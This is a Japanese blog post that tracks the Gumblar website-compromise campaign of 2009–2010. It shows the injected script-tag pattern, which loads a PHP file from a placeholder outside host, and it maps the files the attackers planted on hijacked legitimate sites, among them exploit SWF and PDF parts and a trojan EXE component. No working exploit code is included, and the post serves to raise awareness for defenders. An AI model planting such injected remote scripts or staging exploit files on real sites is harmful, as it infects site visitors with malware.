ここから本文です
サイトの改ざん、コンピュータウイルス・セキュリティ、検索エンジンYahoo!/Googleらへん...☆彡

書庫ウイルス・セキュリティ

Gumblar改ざん攻撃 再来襲 (Web Botnet - 攻撃データ製造マシン)

Gumblar - The Web Botnet System! :)

+ Gumblar: Farewell Japan (Kapsersky Securelist)
Why...? :(

 2009年10月再来襲な「Gumblar」攻撃者が物置として悪用してる正規サイトに構築されるデータ群。頭文字からswf用、pdf用、exe用なんて思ったりもしたけど、イマイチ判断がつきません。

<script src=http://[sample.com]/[folder]/[file].php ></script>

http://[sample.com]/[folder]/
  └ [sample].php <-- コード生成
  └ (gifimg.php)
  └ s/
    └ 1/ 〜 9/
    └ g.dat <-- GeoIP
    └ s.dat <-- Exploit SWF 用
    └ p.dat <-- Exploit PDF 用
    └ e.dat <-- Virus EXE 用
    └ h.dat <-- Referer
    └ h.dat2 <-- Referer
    └ r.dat <-- ???
    └ r.dat2 <-- ???
 s.dat、p.datが送り込まれるSWFファイル(Flash)とPDFファイルの部品。e.datが発動させるトロイの木馬ウイルスの部品。

iframes are EVIL! Hate Zeus!


(追記...)
 2009年11月18日より。
<script src=http://[sample.com]/[folder]/[file].php ></script>

http://[sample.com]/[folder]/
  └ [sample].php <-- コード生成
  └ (gifimg.php)
  └ s/
    └ 1/ 〜 9/
    └ g.dat <-- GeoIP
    └ s.dat <-- Exploit SWF 用
    └ p.dat <-- Exploit PDF 用
    └ e.dat <-- Virus EXE 用
    └ h.dat <-- Referer
    └ h.dat2 <-- Referer
    └ r.dat <-- ???
    └ r.dat2 <-- ???
    └ b.dat <-- ??? New!
    └ x.dat <-- ??? New!

<script src=http://[sample.com]/[folder]/[file].php ></script>

http://[sample.com]/[folder]/
  └ [sample].php <-- リダイレクトJS
  └ (gifimg.php)
  └ r.dat3 <-- ???
  └ s/
    └ 1/ 〜 9/
    └ h.dat2 <-- Referer
    └ r.dat2 <-- ???


(追記...)
 2010年2月4日より。
<script src=http://[sample.com]/[folder]/[file].php ></script>

http://[sample.com]/[folder]/
  └ [sample].php <-- コード生成
  └ (gifimg.php)
  └ s/
    └ 1/ 〜 9/
    └ g.dat <-- GeoIP
    └ s.dat <-- Exploit SWF 用
    └ p.dat <-- Exploit PDF 用
    └ e.dat <-- Virus EXE 用
    └ h.dat <-- Referer
    └ r.dat <-- ???
    └ b.dat <-- ???
    └ x.dat <-- ???


(追記...)
 2010年2月16日より。
<script src=http://[sample.com]/[folder]/[file].php ></script>

http://[sample.com]/[folder]/
  └ [sample].php <-- コード生成
  └ (gifimg.php)
  └ s/
    └ 1/ 〜 9/
    └ g.dat <-- GeoIP
    └ s.dat <-- Exploit SWF 用
    └ p.dat <-- Exploit PDF 用
    └ e.dat <-- Virus EXE 用
    └ j.dat <-- JRE 用 New!
    └ h.dat <-- Referer
    └ r.dat <-- ???
    └ b.dat <-- ???
    └ x.dat <-- ???

Gumblar(ガンブラー)による正規サイトの改ざん被害が再来襲! 最新情報はこちら

「ウイルス・セキュリティ」書庫の記事一覧

もっと見る

開くトラックバック(0)

連携サービス
知恵袋
ロコ
求人

Yahoo!ブログからのお知らせ

noooo_spam
noooo_spam
非公開 / 非公開
人気度
Yahoo!ブログヘルプ - ブログ人気度について
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
検索 検索
友だち(5)
  • who
  • ★ピサロ★
  • Kerupani129
  • Cookies
  • 物知りマン
友だち一覧

よしもとブログランキング

もっと見る
本文はここまでですこのページの先頭へ

[PR]お得情報

数量限定!イオンおまとめ企画
「無料お試しクーポン」か
「値引きクーポン」が必ず当たる!
ふるさと納税サイト『さとふる』
11/30まで5周年記念キャンペーン中!
Amazonギフト券1000円分当たる!

その他のキャンペーン

みんなの更新記事
前へ 次へ